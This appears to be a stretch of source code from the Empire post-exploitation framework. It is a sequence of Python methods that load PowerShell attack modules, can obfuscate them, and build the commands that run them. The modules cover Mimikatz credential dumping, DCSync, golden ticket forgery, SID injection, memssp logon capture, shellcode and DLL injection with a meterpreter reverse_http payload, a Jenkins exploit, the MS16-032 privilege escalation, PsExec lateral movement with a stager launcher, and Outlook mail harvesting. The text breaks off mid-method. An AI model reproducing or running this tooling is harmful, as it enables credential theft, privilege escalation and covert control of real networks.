def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nExploit-Jenkins"
scriptEnd += " -Rhost "+str(self.options['Rhost']['Value'])
scriptEnd += " -Port "+str(self.options['Port']['Value'])
command = str(self.options['Cmd']['Value'])
# if the command contains spaces, wrap it in quotes before passing to ps script
if " " in command:
scriptEnd += " -Cmd \"" + command + "\""
else:
scriptEnd += " -Cmd " + command
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# build the dump command with whatever options we want
scriptEnd = "Invoke-Mimikatz -DumpCreds;"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
instance = self.options['Instance']['Value']
query = self.options['Query']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLQuery.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
scriptEnd = " Get-SQLQuery"
if username != "":
scriptEnd += " -Username "+username
if password != "":
scriptEnd += " -Password "+password
if instance != "":
scriptEnd += " -Instance "+instance
scriptEnd += " -Query "+"\'"+query+"\'"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SPN.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nGet-SPN"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -List yes | Format-Table -Wrap | Out-String | %{$_ + \"`n\"}"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# the PowerShell script itself, with the command to invoke
# for execution appended to the end. Scripts should output
# everything to the pipeline for proper parsing.
#
# the script should be stripped of comments, with a link to any
# original reference script included in the comments.
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Find-TrustedDocuments.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Find-TrustedDocuments"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = ""
if self.options['Method']['Value'].lower() == "sekurlsa":
scriptEnd += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'"
else:
scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-ShellcodeMSIL"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values['Value'].split("\\"))[1:]
scriptEnd += " -" + str(option) + " @(" + sc + ")"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-DllInjection.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nInvoke-DllInjection"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/trollsploit/Get-RickAstley.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
script = f.read()
f.close()
scriptEnd = moduleName + " "
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/recon/HTTP-Login.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nTest-Login"
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "showall":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " | Out-String"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# build the custom command with whatever options we want
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode + "\n"
scriptEnd = moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"lsadump::dcsync /user:"******"domain"]['Value'] != "":
scriptEnd += " /domain:" + self.options['domain']['Value']
if self.options["dc"]['Value'] != "":
scriptEnd += " /dc:" + self.options['dc']['Value']
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = moduleCode
scriptEnd = "\nFind-KeePassconfig | Get-KeePassConfigTrigger "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-WinEnum "
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# ridiculous escape format
groups = " ".join(['"\\""'+group.strip().strip("'\"")+'"""' for group in self.options["Groups"]['Value'].split(",")])
# build the custom command with whatever options we want
command = '""misc::addsid '+self.options["User"]['Value'] + ' ' + groups
# base64 encode the command to pass to Invoke-Mimikatz
scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exfil/Invoke-EgressCheck.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# Need to actually run the module that has been loaded
scriptEnd = 'Invoke-EgressCheck'
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
folderName = self.options['FolderName']['Value']
maxEmails = self.options['MaxEmails']['Value']
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode + "\n"
scriptEnd = "Get-OutlookFolder -Name '%s' | Get-EmailItems -MaxEmails %s" %(folderName, maxEmails)
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-Portscan.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-PortScan -noProgressMeter -f"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# build the custom command with whatever options we want
command = "misc::memssp"
# base64 encode the command to pass to Invoke-Mimikatz
scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nInvoke-Shellcode -Force"
listenerName = self.options['Listener']['Value']
if listenerName != "":
if not self.mainMenu.listeners.is_listener_valid(listenerName):
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# TODO: redo pulling these listener configs...
#Old method no longer working
#temporary fix until a more elegant solution is in place, unless this is the most elegant???? :)
#[ID,name,host,port,cert_path,staging_key,default_delay,default_jitter,default_profile,kill_date,working_hours,listener_type,redirect_target,default_lost_limit] = self.mainMenu.listeners.get_listener(listenerName)
host = self.mainMenu.listeners.loadedListeners['meterpreter'].options['Host']['Value']
port = self.mainMenu.listeners.loadedListeners['meterpreter'].options['Port']['Value']
MSFpayload = "reverse_http"
if "https" in host:
MSFpayload += "s"
hostname = host.split(":")[1].strip("/")
self.options['Lhost']['Value'] = str(hostname)
self.options['Lport']['Value'] = str(port)
self.options['Payload']['Value'] = str(MSFpayload)
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "listener":
if values['Value'] and values['Value'] != '':
if option.lower() == "payload":
payload = "windows/meterpreter/" + str(values['Value'])
scriptEnd += " -" + str(option) + " " + payload
elif option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values['Value'].split("\\"))[1:]
scriptEnd += " -" + str(option) + " @(" + sc + ")"
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += "; 'Shellcode injected.'"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# generate the launcher code without base64 encoding
l = self.mainMenu.stagers.stagers['multi/launcher']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
l.options['Base64']['Value'] = 'False'
launcherCode = l.generate()
# need to escape characters
launcherCode = launcherCode.replace("`", "``").replace("$", "`$").replace("\"","'")
scriptEnd = 'Invoke-MS16032 -Command "' + launcherCode + '"'
scriptEnd += ';`nInvoke-MS16032 completed.'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-ReverseDNSLookup.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-ReverseDNSLookup"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
# only return objects where HostName is not an IP (i.e. the address resolves)
scriptEnd += " | % {try{$entry=$_; $ipObj = [System.Net.IPAddress]::parse($entry.HostName); if(-not [System.Net.IPAddress]::tryparse([string]$_.HostName, [ref]$ipObj)) { $entry }} catch{$entry} } | Select-Object HostName, AddressList | ft -autosize | Out-String | %{$_ + \"`n\"}"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-NinjaCopy.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "$null = Invoke-NinjaCopy "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
computerName = self.options['ComputerName']['Value']
serviceName = self.options['ServiceName']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
command = self.options['Command']['Value']
resultFile = self.options['ResultFile']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-PsExec.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = ""
if command != "":
# executing a custom command on the remote machine
return ""
# if
else:
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher generation.")
return ""
else:
stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
scriptEnd += "Invoke-PsExec -ComputerName %s -ServiceName \"%s\" -Command \"%s\"" % (computerName, serviceName, stagerCmd)
scriptEnd += "| Out-String | %{$_ + \"`n\"};"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/Invoke-RunAs.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
script = f.read()
f.close()
scriptEnd = "\nInvoke-RunAs "
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
if credType != "plaintext":
print helpers.color("[!] A CredID with a plaintext password must be used!")
return ""
if domainName != "":
self.options["Domain"]['Value'] = domainName
if userName != "":
self.options["UserName"]['Value'] = userName
if password != "":
self.options["Password"]['Value'] = password
if self.options["Domain"]['Value'] == "" or self.options["UserName"]['Value'] == "" or self.options["Password"]['Value'] == "":
print helpers.color("[!] Domain/UserName/Password or CredID required!")
return ""
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "credid":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
if userName != "krbtgt":
print helpers.color("[!] A krbtgt account must be used")
return ""
if domainName != "":
self.options["domain"]['Value'] = domainName
if sid != "":
self.options["sid"]['Value'] = sid
if password != "":
self.options["krbtgt"]['Value'] = password
if self.options["krbtgt"]['Value'] == "":
print helpers.color("[!] krbtgt hash not specified")
# build the golden ticket command
scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::golden"
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "credid":
if values['Value'] and values['Value'] != '':
scriptEnd += " /" + str(option) + ":" + str(values['Value'])
scriptEnd += " /ptt\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
procID = self.options['ProcId']['Value'].strip()
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
arch = self.options['Arch']['Value']
